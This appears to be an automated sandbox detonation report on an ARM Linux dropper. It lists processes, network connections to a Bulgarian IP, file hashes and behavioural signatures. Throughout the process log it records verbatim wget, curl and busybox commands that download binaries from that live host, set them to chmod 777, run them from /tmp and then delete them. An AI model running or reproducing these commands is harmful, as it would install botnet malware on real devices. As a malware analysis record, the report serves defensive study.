/usr/bin/curl
[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/chmod
[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/rm
[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/wget
[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/chmod
[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/rm
[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.21:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 01:17
Reported
2024-10-25 01:19
Platform
debian9-armhf-20240418-en
Max time kernel
32s
Max time network
33s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | N/A |
| N/A | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | N/A |
| N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | N/A |
| N/A | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | N/A |
| N/A | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | N/A |
| N/A | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | N/A |
| N/A | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | N/A |
| N/A | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | N/A |
| N/A | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | N/A |
| N/A | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | N/A |
| N/A | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | N/A |
| N/A | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | N/A |
| N/A | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | N/A |
| N/A | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | N/A |
| N/A | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | N/A |
| N/A | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | N/A |
| N/A | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | N/A |
| N/A | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | N/A |
| N/A | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /usr/bin/curl | N/A |
Processes
/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/chmod
[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/rm
[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/wget
[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/chmod
[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/rm
[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/wget
[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/chmod
[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/rm
[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/chmod
[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/rm
[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/wget
[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/chmod
[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/rm
[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/wget
[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/chmod
[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/rm
[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/wget
[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/chmod
[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/rm
[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/wget
[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/chmod
[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/rm
[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
